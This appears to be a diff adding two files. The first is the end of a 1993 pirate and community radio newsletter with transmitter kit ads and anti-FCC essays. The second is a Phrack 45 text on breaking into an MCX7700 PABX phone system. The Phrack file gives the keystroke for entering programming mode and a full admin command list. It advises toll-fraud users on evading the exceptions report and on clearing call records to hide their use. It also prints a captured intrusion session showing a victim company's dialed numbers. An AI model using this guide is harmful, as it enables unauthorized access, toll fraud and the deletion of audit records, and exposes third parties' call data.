+making our case. What can you do?
+
+At this stage we ask that you write letters. They should be:
+     "To whom it may concern,"
+
+The content of your letter would depend on your relationship with
+Bush Radio.
+
+If you are a member, we'd like you to say why you think it's
+inappropriate for us to be prosecuted, and include a statement of
+solidarity.
+
+If you are a client, we'd like you to say why you think it's
+inappropriate for us to be prosecuted, and include a statement of
+solidarity.
+
+If you are a client, we'd like to hear about the value of service
+you have derived from Bush Radio, and we would like you to be
+specific about what we did together.
+
+If you are a friend, or supporter, please write whatever you feel
+is appropriate, and we'd appreciate comments on how this kind of
+action undermines confidence in the nature of change in our
+country.
+
+Please send these letters to:
+                     BUSH RADIO at fax no.:
+                        +(27-21) 448-5451
+
+                     and send originals to:
+                         P.O. Box 13290
+                         Mowbray, 7705
+                    Cape Town, South Africa
+
+We should receive these letters by Friday 8th October, or as soon
+as possible thereafter.
+
+Thanking you in anticipation,
+
+JEANNE DU TOIT
+Secretary for the Coordinating Committee
+
+
+   The Solidarity Action Network is an initiative of AMARC,
+    the World Association of Community Radio Broadcasters.
+
+   Action Alerts are posted in the conference amarc.radio
+        carried by many members of the APC Network.
+
+    Email users who do not have access to the APC Network
+   can receive Action Alerts directly by contacting AMARC.
+
+        For more information about AMARC or the
+           Action Network, contact us at:
+
+ 3575 St-Laurent, # 704 - Montreal, Quebec - H2X 2T7  Canada
+         Fax: +(514) 849-7129 - Tel: +(514) 982-0351
+                   Email: amarc@web.apc.org
+
+---------------------------------------------------------------------------
+
+
+                   ***** FREEDOM OF COMMUNICATION *****
+
+
+>From Zeke Teflon's book - Complete Manual of Pirate Radio
+
+     Freedom of communication is a basic human right. Like all rights,
+freedom of communication consists of being able to exercise your
+abilities with- out interference. Government cannot give you your
+abilities, but it sure as hell can (and will) interfere with you when
+you exercise them. Government cannot give you rights. It can only
+take them from you. If all governments (goons with guns forcing others
+to follow their dictates through violence and coercion) were to
+cease to exist, human rights would certainly not cease along with
+them.
+
+     The naive objection could be raised that while governments cannot
+give you rights, they can protect them by preventing your fellow citizens
+from interfering with you. That's the theory. In practice, governments
+rarely 'protect' citizens' rights, and then only when it suits their
+political purposes. Invariably, when governments feel the least
+bit threatened, they place their own 'security' needs above the human
+rights they supposedly safeguard. Through- out history the vilest
+and most consistent violators of human rights have been governments.
+Governments, along with their bedfellows, organized religions, have
+been responsible for the overwhelming bulk of human rights violations
+in every human civilization.
+
+     We cannot look to government to protect our rights. We have to do
+it ourselves, and an effective means of doing that is by exercising
+our rights. Use 'em or lose 'em.
+
+---------------------------------------------------------------------------
+
+                     ***** Connecting to the Net *****
+
+     One of the best tools for the immediate transfer of news, information
+and discussion is the Internet.  With any basic computer and a modem, world
+wide access is just a few keystrokes away.  In the Bay Area one of the best
+Interest access providers is CRL, for a flat rate of $18 per month you will
+have all the Interent resources available to you.  Resources include the
+ability to send email to anyone else in the world who is on the net as
+well, check out hundreds of news groups for the latest and weirdest
+happenings, send breaking news and information to other community
+broadcasters, etc.
+     At the moment we are working on a way to digitally record and compress
+5 to 15 minute audio spots into a computer file which can be sent anywhere
+in the world where there is a computer to receive it.  With an inexpensive
+digital recording and playback card which plugs into any basic PC system,
+micro power broadcasters will be able to send and receive these spots to
+and from anywhere in the world.  This completely bypasses the rather
+expensive satellite feeds and makes for a much more decentralized system of
+distribution.  If you are interested in this project please contact us.
+To reach CRL in regards to an Internet account give them a call (415) 381-
+2800.
+--------------------------------------------------------------------------
+
+      ***** MICRO POWER BROADCASTING, TECHNOLOGY FOR THE PEOPLE *****
+
+     With circuit board dimensions of 2" x  4 1/2", a five
+watt FM micro power transmitter is capable of covering a community
+3-5 miles in radius.  Such compact and inexpensive technology has
+the possibility of giving each and every community its own voice.  Stephen
+Dunifer with Free Radio Berkeley has been designing and developing
+this unit along with a series of other transmitters, amplifiers and
+antennas over the last year.  Mass produced RF transistors and
+communications IC's have made it possible to design and build stable and
+clean transmitters and amplifiers for a fraction of the cost of brand name
+type accepted equipment.  Even the entry level 5 watt kit, using only three
+transistors, is very stable once tuned and set up.
+     Even more sophisticated phase lock loop (PLL) frequency
+control designs are not that much more expensive to design and produce.  At
+this moment, several individuals are working on low cost PLL designs
+which should meet current FCC requirements for frequency stability.  When
+these designs are finished they will be available in kit form and
+assembled as well (for shipment outside US only).
+     What does it take to put a micro power broadcasting operation
+on the air ?  First off, less than $500.  A basic 5 watt FM transmitter,
+output filter (very necessary to reduce output harmonics), coax cable
+(50-100 ft RG8), antenna and power supply (battery or 12 volt regulated
+and filtered unit) is going to cost about $125-150.  This is assuming
+assembly of kit and antenna.  Next, a VHF power meter ($30-$40 at
+Radio Shack), a dummy load (make from resistors or $19 at Radio Shack)
+and a frequency counter ($50-150) are needed for tuning and keeping
+things optimized.  Beyond those requirements one sort of audio source
+(line level -10 dbm, .3 volts) or another is needed to feed the
+transmitter.  This source can be a walkman type cassette unit, a mixing
+board, tape deck, etc.  Granted this is not a professional studio but for
+low budget community operations, it does not take top end gear.  Creativity
+and determination as shown by many community stations can certainly make
+up the difference.
+     Once all the equipment has been assembled and arranged,
+a suitable place needs to be found for the operation and setting up
+the antenna.  With FM, which is line of sight transmission, the higher
+the antenna the better.  Depending on the regulations and political
+climate of the country in which you live, your operation may need
+to be portable for rapid set-up and break down.  That seems especially
+true here in the United Corporate Snakes of America.
+     At the core of this is the potential to set up loosely
+coupled autonomous networks of communication around entire planet,
+outside the grasp of corporate/government control.  This is the goal
+of the Free Communications Coalition, the umbrella organization which
+is being formed to support, defend and encourage micro power broadcasting.
+     Micro power technology makes this possible through a
+combination of low power. inexpensive FM, AM, TV and shortwave
+transmitters.  Free Radio Berkeley, San Francisco Liberation Radio and
+other interested parties will be placing an international shortwave station
+on the air (100-300 watts initially at 40 meters -  7.4 to 7.5 Mhz range,
+increasing to 1000) sometime in November, 1993.  If we had to use
+tube designs, doing such an operation would be impossible due to the
+portability requirements.  Instead, relatively inexpensive transistor
+designs allow to us build linear shortwave amplifiers capable of output
+powers exceeding 1000 watts while running off a bank of lead acid
+batteries.  Certainly, within the normal definitions, 100 to 1000
+watts on shortwave is definitely beyond the usual micropower definition.
+However, when right wing evangelical ranters are running 100-500 KW it
+could be considered to be micropower. At the moment, Free Radio Berkeley is
+offering an entire line of transmitter and amplifier kits for FM
+broadcasting along with antenna and equipment designs.  Assembled
+units are available for sale outside the US only.  A rather effective
+antenna can be built using common hardware store parts for about $10.  Our
+work will be expanding to include UHF & VHF TV, AM and shortwave designs.
+     We would like to find other engineers and technically
+inclined people to help increase these efforts since we are a rather
+small design and development operation.  Further, we need such technically
+inclined people to act as advisors and facilitators in the process
+of helping people build, test, tune, and setup their transmitters
+and antennas.  That way, we can create a pool of people across the
+country and world who will be available to lend a technical hand to
+those who wish put micropower broadcasting operations on the air.
+
+Let a thousand transmitters bloom
+
+Stephen Dunifer
+Free Radio Berkeley / Free Communications Coalition - the People's FCC
+
+
+---------------------------------------------------------------------------
+
+                     Freedom of Broadcasting in Italy
+
+     Just for you to know, back in 1974/75 Radio Milano International in
+Milano (not associated with us) started as the first private-pirate
+FM station in this country, operating from a van which kept moving
+around the town to avoid the PTT authorities (equivalent of the FCC).
+RMI brought the first regular stereo programs to Italy, good music
+not heard before on state channels, as the other stations which came
+after them did. They also went to court and fought for "free", private
+radio and freedom of speech over radio and won against the old Postal
+law which considered broadcasting as State Monopoly. Today RMI is
+one of the major national radio networks with hundreds of repeaters
+all over the Italian peninsula, while thousands of private radio and
+TV stations obtained authorizations to broadcast legally over the
+years.
+     If you have a story to tell on pirate radio, or information to share
+(voice/paper/email), please get in touch with us. On shortwave we reach
+also many European Pirates who would love to hear from you. (We indeed
+carried "legally" some of the pirates programs in the past in order
+to offer them better coverage to their "alternative" programs. Something
+we would also like to do again the future.)
+
+Please send email to 100020.1013@compuserve.com, including a phone
+number and times when we can call possibly you from Europe for an
+interview. We will guarantee anonymity if so desired, since our Shortwave
+transmissions may also be heard in the USA. We'll love to hear from
+you! 73, Alfredo --- Alfredo E. Cotroneo, President, NEXUS-International
+Broadcasting Association PO BOX 10980, I-20110 Milano, Italy phone:
++39-2-266 6971 | fax: +39-2-706 38151
+
+---------------------------------------------------------------------------
+
+Notes from the Net on the FCC
+
+One person writes about his FCC bust on the Usenet newsgroup
+alt.radio.pirate:
+
+When I was busted in 1984, the FCC used a tan-colored
+buick passenger car.  The passenger seat had been ripped out and was
+replaced with a rack of receiving equipment--nothing special, just
+commercially-available stuff.  In the trunk was a pair of batteries
+driving inverters.  The engine had a second alternator to charge the
+batteries.  Beneath the vinyl roof was a direction-finding antenna
+array that was connected to an indicator on the dashboard.  They'd
+just drive in the direction indicated until they reached the transmitter.
+     That car served 3-4 states in the Northwestern US.  How
+do I know all this?  After the guy finished writing me up, I asked
+him to show me his equipment.  After all, I showed him mine.  He started
+to say no, but then changed his mind since there was nothing secret
+involved.
+
+Don Hackler responds:
+
+     When I was engineering an directional AM broadcast station,
+the station was inspected by two FCC engineers driving a similar car.
+The roof had been removed and replaced with a fiber glass replica
+of the original.  The antennae were embedded in the new roof, and
+there were no indications of anything `special' about the roof, inside
+or out.
+     I was given a ride in the car to go check some of the
+monitor points with a field-strength meter.  The passenger bucket
+seat had been replaced by a 3 foot tall rack on a swivel mount, so
+the driver or a passenger in back could operate the equipment.  The
+rack had a slip cover made of upholstery vinyl that matched the car's
+interior.  They refused (nicely) to let me see the equipment, but
+said it was just standard equipment; i.e. a spectrum analyzer and
+some general coverage receivers.
+     I never understood why they didn't allow a peek, but
+I assumed it was probably some policy they were following.  That was
+my first, and so far only, FCC inspection.
+
+Don Hackler  - donh@shakala.com Shakala BBS (ClanZen Radio Network)
+Sunnyvale, CA 1-408-734-2289
+
+---------------------------------------------------------------------------
+
+             ***** Why Support Micro-Power Broadcasting? *****
+
+
+     Number One:  The issue is freedom of speech.  It's truly
+shocking what the Federal Communications Commission has allowed to
+happen. Media access is becoming too restricted for regular people
+to get their message across.  As each day passes,  radio, television,
+and newspaper media gets gobbled up pac-man style by big outfits like
+Sony/CBS, GE/NBC, ATT,  ABC, Time-Warner Communications, Hearst, Gannett,
+Disney, Ted Turner, or even Fox.  Our local media mogul, James Gabbert,
+owns an AM, FM, and television station in the same area.  Middle America
+gets bombarded with religious broadcasters and urban areas get millions
+of watts of commercial crap beaming out from huge towers.  Arbitron
+and Neilson decide which stations have what percentage of the listening
+audience.  This situation must be changed so that truly free communication
+can have a chance to survive.  In the 90's we need some space on the
+broadcast bands for community radio and television.  Cable TV is promising
+hundreds of channels to choose from, but most of this stuff will be
+generated by the existing media networks.  The problem here is that
+minority opinions are not heard.  Censorship can not be tolerated
+in a democratic society.  Freedom of information is what we need.
+     Number Two:  The technology has changed.  It used to be very expensive
+to run a radio station.  With modern electronics, however, small radio
+stations can be on the air with a minimal investment.  In fact, people
+in Japan have been doing micro-power broadcasting  for years.  Most
+people in the U.S. just have AM, FM, and TV receivers.  To reach these
+people, you usually have to buy advertising time on a commercial station.
+That's assuming some station is willing to broadcast your tape!  What we
+want is true public access to the airwaves for everyone, not just
+the rich and powerful.  The cloud of secrecy about broadcasting has
+lifted and now we know that media power has been stolen by our own
+government,  and sold to the highest bidder.  People need media access
+because human beings have a natural need to communicate with each
+other.   Cable TV and Audio service should feature input from the
+community at large.  The old concept of standing on a soap box and
+calling out to your fellow citizens will not work in the computer
+age.
+     Number Three:  Health Concerns about Radio energy, in large doses,
+it is considered by some to be a real health hazard. Incidence of
+leukemia and cancer runs high among men who work on high power transmitting
+towers.  People in San Francisco get blasted with literally millions
+of watts of energy coming from Sutro Tower.  This is because some
+radio and television stations want to be picked up 100 miles away.
+Scientific opinion on the effects of exposure to radio waves varies quite a
+bit, but if you're one of those people living up near Sutro Tower, maybe
+you should move.  Micro-power is the sane way to use radio and tv.  The
+space on the radio and tv dial should be spread around to all interested
+parties, not just a small group of companies.  Broadcast power levels
+for all stations should come down to safer levels.
+
+-Paul Griffin
+
+
+---------------------------------------------------------------------------
+
+                 ***** KITS FROM FREE RADIO BERKELEY *****
+
+
+First, a word from our legal department:
+
+For educational purposes only.  These kits are offered for the furtherance
+of one's knowledge regarding radio frequency design and principles.  At all
+times during operation the assembled unit must be connected to a dummy
+load.  Part 15 of the FCC rules prohibits an antenna being used with these
+units.  All responsibilities for the ultimate use of these kits are born
+solely by the builder and/or operator.
+
+
+KITS AVAILABLE NOW !
+
+
+All kits are complete and come with professionally manufactured, drilled
+and tinned PC boards.  All coils are pre-wound.  Each unit, unless
+specified, requires 12 volts for proper operation.  Full instructions and
+diagrams included.
+
+
+5 Watt FM Transmitter - $45
+
+     An improved version of the Panaxis 5 watt design with a much more
+rugged output transistor capable of producing 6-7 watts.  Oscillator is a
+stable FET based VFO.
+
+
+6 watt RF Amplifier - $25
+
+     Uses the same output transistor as above.  Will produce 6 watts for
+1/2 watt input drive.  Easy, quick assembly.
+
+
+15 watt RF Amplifier - $35
+     Uses a very high gain (14dB) RF transistor to boost a 1/2 watt input
+to 15 watts.  Complete with PC Board and all required parts.
+
+
+25-30 watt RF Amplifier - $35
+
+     Will produce full power with an input drive of 4-5 watts.
+
+
+1/2 to 1 watt Amplifier - $18
+
+     1/2 to 1 watt output for an input power of 10 mw.  Great for boosting
+lower power VFOs.
+
+
+Output Filter Kit - $5.00
+
+A seven element low pass filter, composed of 4 coils and 3 capacitors, to
+flatten those harmonics.  Specify cutoff frequency desired.
+
+
+COMING REAL SOON !
+
+
+1/2 - 1 watt Stereo Broadcast Transmitter - $35
+
+     A vast improvement over the Ramsey FM-10.  It uses the BA1404 IC as a
+stereo modulator only to modulate a FET vfo, buffer and amp chain.  Better
+audio input filtering and bypassing.  IC voltage regulation for the 2.5
+volt supply for the BA1404.  A very rugged output stage and collector
+voltage bypassing make this unit stand out from all other transmitter
+designs using the BA1404 chip.
+
+
+Stereo Audio Processor - $Price to be determined
+
+A combined stereo generator using the BA1404 coupled with compandor ICs for
+compression and limiting of audio signals
+
+
+If you have any other particular requirements please let us know.  Custom
+design and fabrication services are available including PC layout and
+production.  Full CAD services as well.
+
+
+Proceeds from the sales of these kits go to the furtherance of micro power
+broadcasting, bringing a voice of empowerment to every community.
+
+Please add $3.00 for handling and shipping for each kit.
+
+Payment to be made out to cash or to Stephen Dunifer, we are still working
+out the bank trip.  Send to:
+
+Free Radio Berkeley
+1442 A Walnut St., #406
+Berkeley, CA 94709
+
+Voice mail:  (510) 464-3041
+
+---------------------------------------------------------------------------
+
+                                On the Air
+
+Free Radio Berkeley - Sundays from 9 PM to 12 Midnight at 88.1 FM.  Call
+their voice mail # (510) 464-3041 for further information.  Or write them:
+1442 A Walnut St., #406, Berkeley, 94709.
+
+San Francisco Liberation Radio - Wednesdays & Saturdays from 8 PM to 10 PM
+at 93.7 FM.  Call their voice mail # (415) 487-6308 for further information
+and to help out.  Or write them: San Francisco Liberation Radio, 350 7th.
+Ave, Box35, San Francisco CA, 94118.
+
+Southern Marin, San Rafael Area - schedule  not known at this time, try
+87.9 FM.
+
+Southern Marin, Sausalito - left end of the dial most every night, try 87.9
+FM.
+
+Mission District, SF - LaRaza station, schedule not known, try 87.9 FM
+
+Santa Cruz - Either on the air or soon to be, schedule & frequency not
+known at this time
+
+     More stations taking to the air all the time, look for a whole network
+to be happening in Berkeley.  An attendee of the New York City workshop is
+on the air in Connecticut with 5 watts as Ragged Mountain Liberation Radio.
+Phone calls are coming in from around the country, keep those calls and
+letters coming.
+     From San Francisco Liberation Radio:  Each SFLR program closes with
+the words: "Fascists are like cockroaches.  Shine a light on them and they
+scurry away.  And together, you and I can be the light."  Richard Edmondson
+of SFLR, author of that slogan, said, "Well, first and foremost of all it
+seemed like a truism, and it seemed like the sort of phrase to end a radio
+program with - catchy."
+     Stephen Dunifer with Free Radio Berkeley added, "Yes, but cockroaches
+do not carry guns".  One of Free Radio Berkeley's favorite tag lines is
+"Are you going to continue to live the lie or are you going to act the truth
+?
+     Both San Francisco Liberation Radio and Free Radio Berkeley have been
+carrying a lot of very diverse and interesting programming ranging from
+Food Not Bombs Radio Network programs to Jello Biafra declaring that
+Urinalysis is Freedom to local street interviews to an interview with the
+former program director at Pacicifa station WPFW in Washington, DC.  If you
+are interested in producing programs, conducting news gathering and
+interviews, etc. or have tapes of your band, performance piece, etc.  or
+wish to help out in any other way, please contact either Free Radio
+Berkeley or San Francisco Liberation Radio.  Tapes may be mailed to the
+return address on this newsletter in care of Free Radio Berkeley.  Let your
+voices and performance art be heard !
+
+---------------------------------------------------------------------------
+
+                               In the Media
+
+     Within the last few months, a considerable amount of media attention
+has been focused on Micropower Broadcasting.  Articles have appeared in the
+East Bay Express, SF Weekly, Bay Guardian, Oakland Tribune, San Jose
+Mercury, Daily Cal, SF Chronicle, Berkeley Voice and New York Daily News.
+CNN put together a  news story about Free Radio Berkeley which aired
+nationally and was picked up and rebroadcast by Channel 2 in Oakland.
+     More coverage is expected to be forthcoming.  An article may appear in
+the New York Times.  KQED radio is working on a story.  A fifteen page
+article on guerilla media will be in Mondo 2000, due out the first of
+November.  Channel 31 (Marin County) is covering one of the broadcast
+operations in San Rafael.  A press and info packet is going to be sent out
+around the country.  Any help you can offer in the area of community and
+media outreach would be greatly appreciated.  It is our intent to build an
+international movement and coalition.  Contact the Free Communications
+Coalition (510) 464-3041
+
+---------------------------------------------------------------------------
+
+                         FUND RAISING VIDEO PARTY
+
+           Featuring: Pump Up the Volume, Medium Cool and videos
+                        from Black Liberation Radio
+
+Saturday, November 13 - 8 PM
+809 B Allston Way, Berkeley
+
+(two blocks south of University Ave., between 5th and 6th streets)
+
+     $5-? donation.  Free popcorn provided.  Help us pay our operational
+expenses.
+
+___________________________________________________________________________
+
+
+                        HELP TAKE BACK THE AIRWAVES
+                  FREE COMMUNICATIONS COALITION MEETING
+
+Saturday, November 13 - 5 PM
+809 B Allston Way, Berkeley
+
+     With the dramatic increase in publicity (Free Radio Berkeley made the
+front page of the Sunday New York Times - Oct. 24) and response we have
+experienced in the last month or so, it is rather important that all of us
+who are concerned with the defense, support and promotion of micro power
+broadcasting come together to plan and create a strategy which will lead to
+the Free Communications Coalition (the Peoples' FCC) becoming an
+international umbrella under which micropower broadcasting can flourish.
+
+     To that end, you are invited to attend the meeting of the Free
+Communications Coalition on Saturday, November 13 at 5 PM.  It will be held
+at 809 B Allston Way (between 5th & 6th streets) in Berkeley.  This will be
+a pot luck dinner meeting, bring a vegetarian dish to share.  Following, at
+8PM will be a video benefit, see above for further details.
\ No newline at end of file
diff --git a/phrack45/25.txt b/phrack45/25.txt
new file mode 100644
index 0000000..2a78158
--- /dev/null
+++ b/phrack45/25.txt
@@ -0,0 +1,490 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 25 of 28
+
+****************************************************************************
+
+
+ ///////////////          THE MCX7700 PABX SYSTEM            ////////////////
+///////////////   Brought to you courtesy of [)elamo Labz   ////////////////
+//////////////    and the ChUrCH oF tHE Non-CoNForMiST++  ////////////////
+               (warespeoplessuckwarespeoplessucksuksuk)
+
+Greetings from myself, The Evil [)r. [)elam!
+
+In this text file I present a PBX that identifies itself as an "MCX7700"...
+probably the easiest PBX hack you'll find, and not a bad system... I've seen
+worse.
+
+
+
+Dis'-claimer: (This is the part where I get to Dis' the system.)
+-------------
+This particular system is wide open and it's not my problem the owners
+decided to buy a lame system.  Via freedom of the press I am publishing
+my findings, so if anyone gets pissed off about this file *PHUCK 0FF*!
+
+
+
+Ab-Using the system:
+--------------------
+Once a data connection is established, press the '*' key to enter
+programming mode.  In programming mode, all commands are given as 2 digit
+combinations.  Some of the commands are macros of other commands. Example:
+command 50 will do a command 15 plus enter a response to the question "Clear
+all call records Yes/No".  This particular system uses only extensions..
+not accounts, but has the capability to do both.  The system sends EOF
+(CTRL-Z) characters after every command, this is NOT something I typed.
+I replaced all occurrences of CTRL-Z characters with <-CTRL Z-> in this phile
+for obvious reasons.
+
+
+
+Note to |<odez |<iddiez:
+------------------------
+For all you kiddiez who think you can bang the fuck outta codez and never
+get caught, you might think again after reading this phile.  Command 55
+"Exceptions report" is most likely what the system owner looks at every
+month.  The report includes Most Expensive Calls, Longest Calls, and Most
+Frequently Called Numbers.  Avoiding being caught is as simple as hiding
+among the rest of the crowd. I.E. don't fucking call Japan or stay on for 8
+hours, and don't call the same BBS 100 times on a code in a month.  The
+administrator most likely will glance at the printout and see which
+department has a fuckup in it who calls his mistress in Egypt every day, and
+go rag him out... if you're not one of the top in the exceptions report,
+chances are they'll never know.  If you happen to have the dataline to the
+PBX then who the fuck cares.. just clear the fucking call records.
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+
+List of Commands:
+-----------------
+00 Terminate programming
+10 System parameters menu (PRINTER = 1 / PABX = 2 / REPORT = 3 / OPTIONS = 4)
+11 Change current time
+12 Change current date
+15 Clear all call records Y/N
+16 Set start date
+17 Set trunk assignments
+18 Set group number
+19 "STORED NUMBER ENTRY, 4=ABVD, 5-8=OCC ?"
+30 Show system parameters
+31 Summary of extensions sort
+32 Summary of accounts sort
+33 Summary of departments sort
+34 Summary of company sort
+35 Summary of trunks sort
+36 Report of all call records
+37 Show trunk assignments
+38 Show extension/department assignments
+39 Show stored numbers
+43 <this command froze>
+44 Reports a number
+45 ?
+46 Block Check
+50 Clear all call records macro.. pipes a yes into command 15
+51 <terminated programming>
+52 <terminated programming>
+53 Sort call stats by a specified phone number
+54 Area code sort
+55 Exceptions reports (Most expensive / longest / most frequent calls)
+60 "INTERACTIVE MODE"
+61 <strange>
+62 <nothing>
+63 <this command froze>
+64 Displays a number (5997777B)
+65 Displays system type (MCX-7700/PC V4.0.5  1189)
+67 Set SMDR input
+68 Display SMDR inputs
+69 <shows a line of numbers 01-79>
+70 Full buffer program
+71 Auto report program 1
+72 Auto report program 2
+73 Set index number
+74 Set rate table
+75 Rate table sizes
+76 Pricing types
+79 <nothing>
+80 <strange>
+90 Display full buffer program
+91 Display auto report program 1
+92 Display auto report program 2
+93 List index table
+94 List rate table
+95 Display rate table sizes
+96 Display pricing types
+97 Invalid command
+98 Invalid command
+99 Call record dump
+
+
+"*" key starts programming mode
+<ESC> key aborts commands: "+++ FUNCTION CANCELED +++"
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Here's a capture from a session online. (edited for brevity)
+Settings: Wordlength 8, Parity None, Stop bits 1
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+CONNECT 1200
+
+<< Pressed '*' key >>
+
+PROGRAMMING ENABLED 09/05/92  8:31A
+<-CTRL Z->
+COMMAND ?15
+CLEAR CALL RECORDS - ARE YOU SURE ? <-CTRL Z->
+COMMAND ?17
+SET TRUNK ASSIGNMENTS
+
+POSITION ? -+++ FUNCTION CANCELED +++
+<-CTRL Z->
+COMMAND ?30
+
+SYSTEM PARAMETERS]
+
+PRTR  DIAGNOSTICS  SMDR  FORM-FEED     EXPAND      ESC
+TYPE  A    R    D  BAUD  SIM   LNG   ON     OFF    SEQ
+ 2    N    N    N    2    N    66    014    015    000
+
+ ACCOUNTS      ------TRUNKS------   EXT   ACCESS   TOLL
+SIZE    NO.    NO.   '-'  GRP  EQP SIZE  ABS  COST DIG
+ 04    1024    040    N    2    3    3    Y    N    1
+
+CALL   ----DROP OR REJECT---  AUTO  TO-  LIST
+GRACE LOC  ACT  INC  TRK  EXT  PRD  DAY  NULL
+ 05    N    N    N    N    N    0    Y    N
+
+SER  PC   ZERO
+IAL  PORT  OPR
+ Y    Y    Y
+
+<-CTRL Z->
+COMMAND ?35
+TRUNK USAGE SORT: SUMMARY ?Y
+                       SUMMARY OF TRUNK USAGE
+
+
+    REPORT PERIOD                                                    PAGE  1
+    09/01/92 - 09/05/92                                     09/05/92   8:35A
+
+     TRUNK       TOTAL       TOTAL       AVG TIME     COSTED         TOTAL
+     USED        CALLS       TIME        PER CALL      TIME          COST
+    ------      ------      -------      --------     ------      ----------
+      8080           0           0          0.0            0      $     0.00
+      8086           0           0          0.0            0      $     0.00
+      8087           0           0          0.0            0      $     0.00
+     80001           9          47          5.2           12      $     3.11
+     80002           6          12          2.0            7      $     2.13
+     80003          17          57          3.3            7      $     2.21
+     80004          12          35          2.9            9      $     2.21
+     80005          12          15          1.2            4      $     1.50
+     80006          13          24          1.8            0      $     0.00
+     80007           6          19          3.1            9      $     2.42
+     80008          12          39          3.2            1      $     0.25
+     80009          10          45          4.5           17      $     4.50
+     80010           8          42          5.2            9      $     2.30
+     80011          14          46          3.2           10      $     2.61
+     80012          11          98          8.9           70      $    16.14
+     80013           8          26          3.2            3      $     1.21
+     80014          13          34          2.6           12      $     3.03
+     80015          14          32          2.2            5      $     1.50
+     80016           0           0          0.0            0      $     0.00
+     86001           0           0          0.0            0      $     0.00
+     86003           0           0          0.0            0      $     0.00
+     87001          82         270          3.2          270      $    60.31
+     87002          79         256          3.2          256      $    59.52
+     84002           0           0          0.0            0      $     0.00
+     95001           0           0          0.0            0      $     0.00
+                     0           0          0.0            0      $     0.00
+    ------      ------      -------      --------     ------      ----------
+     TOTAL         326        1097          3.3          701      $   164.95
+
+
+<-CTRL Z->
+COMMAND ?36
+CALL RECORD DUMP :
+ DETAIL?Y
+              REPORT OF ALL CALL RECORDS
+
+
+    REPORT PERIOD                                                    PAGE  1
+    09/01/92 - 09/05/92                                     09/05/92   8:36A
+
+  EXTEN-  TRUNK      NUMBER                      DURATION             ACCOUNT
+   SION   USED       DIALED        DATE    TIME   MINUTES   COST        CODE
+  ------ ------ ---------------- -------- ------ -------- -------- ------------
+    718   80009    (   )911-0000 09/01/92  7:55A     0.5  $    .00
+    311   80011    (   )911-0000 09/01/92  7:55A     1.3  $    .00
+    278   80009    (800)944-1535 09/01/92  8:16A     3.0  $    .00
+    255   80005    (800)944-1535 09/01/92  8:19A     1.3  $    .00
+    261   87001    (   )660-5525 09/01/92  8:28A     4.2  $    .95
+    201   80004    (800)944-1535 09/01/92  8:33A     1.9  $    .00
+    315   87002    (   )841-2586 09/01/92  8:34A     2.3  $    .57
+    314   87001    (   )290-1030 09/01/92  8:44A     3.4  $    .76
+    735   87002    (813)293-4319 09/01/92  8:44A     2.5  $    .71
+    735   87002    (813)293-4319 09/01/92  8:58A     1.2  $    .49
+    255   80009    (800)944-1535 09/01/92  8:56A     6.9  $    .00
+    247   80015    (800)944-1535 09/01/92  9:02A     3.7  $    .00
+    261   80011  O (513)825-3931 09/01/92  9:09A     3.6  $    .00
+    261   87001    (   )644-1061 09/01/92  9:16A     1.3  $    .38
+
+<<ETC....>>
+
+<-CTRL Z->
+COMMAND ?00]
+PROGRAMMING TERMINATED
+
+PROGRAMMING ENABLED 09/05/92  8:40A
+<-CTRL Z->
+COMMAND ?37
+ ]TRUNK ASSIGNMENTS
+
+09/05/92   8:40A  PAGE  1
+
+
+TRUNK 000 =      ,00      TRUNK 001 =  8080,01      TRUNK 002 =  8086,01
+TRUNK 003 =  8087,01      TRUNK 004 =      ,00      TRUNK 005 =      ,00
+TRUNK 006 =      ,00      TRUNK 007 =      ,00      TRUNK 008 =      ,00
+TRUNK 009 =      ,00      TRUNK 010 =      ,00      TRUNK 011 =      ,00
+TRUNK 012 =      ,00      TRUNK 013 =      ,00      TRUNK 014 =      ,00
+TRUNK 015 =      ,00      TRUNK 016 = 80001,01      TRUNK 017 = 80002,01
+TRUNK 018 = 80003,01      TRUNK 019 = 80004,01      TRUNK 020 = 80005,01
+TRUNK 021 = 80006,01      TRUNK 022 = 80007,01      TRUNK 023 = 80008,01
+TRUNK 024 = 80009,01      TRUNK 025 = 80010,01      TRUNK 026 = 80011,01
+TRUNK 027 = 80012,01      TRUNK 028 = 80013,01      TRUNK 029 = 80014,01
+TRUNK 030 = 80015,01      TRUNK 031 = 80016,01      TRUNK 032 = 86001,01
+TRUNK 033 = 86003,01      TRUNK 034 = 87001,01      TRUNK 035 = 87002,01
+TRUNK 036 = 84002,01      TRUNK 037 = 95001,01      TRUNK 038 =      ,00
+TRUNK 039 =      ,00      TRUNK 040 =      ,00
+<-CTRL Z->
+COMMAND ?15
+CLEAR CALL RECORDS - ARE YOU SURE ? Y END DATE NOT FOUND -- CLEAR ALL ??<-CTRL Z->
+<< Nice command!.. 50 is a macro using command 15  with a Y piped into it >>
+OK
+51
+<-CTRL Z->]
+<-CTRL Z->
+COMMAND ?54
+AREA CODE SORT
+
+                        SUMMARY OF AREA CODES
+
+
+    REPORT PERIOD                                                    PAGE  1
+    09/01/92 - 09/05/92                                     09/05/92   9:15A
+
+     AREA       TOTAL        TOTAL      AVG TIME      AVERAGE        TOTAL
+     CODE       TIME         CALLS      PER CALL       COST          COST
+    ------     -------      ------      --------     --------     ----------
+      ***         357          139         2.5       $    .52     $    72.89
+      212          24            8         3.0       $    .84     $     6.75
+      215           1            1         1.0       $    .46     $     0.46
+      216           4            1         4.0       $    .92     $     0.92
+      303           6            3         2.0       $    .58     $     1.75
+      305           3            2         1.5       $    .38     $     0.77
+      404           4            2         2.0       $    .69     $     1.38
+      504           3            2         1.5       $    .46     $     0.92
+      508           5            4         1.2       $    .37     $     1.50
+      513          11            2         5.5       $    .80     $     1.61
+      516          19            4         4.7       $   1.18     $     4.75
+      606          11            1        11.0       $   2.53     $     2.53
+      612           1            1         1.0       $    .50     $     0.50
+      615           5            1         5.0       $   1.15     $     1.15
+      703           9            1         9.0       $   2.30     $     2.30
+      708           9            3         3.0       $   1.00     $     3.00
+      800         371          109         3.4       $    .00     $     0.00
+      813          96           21         4.5       $   1.11     $    23.49
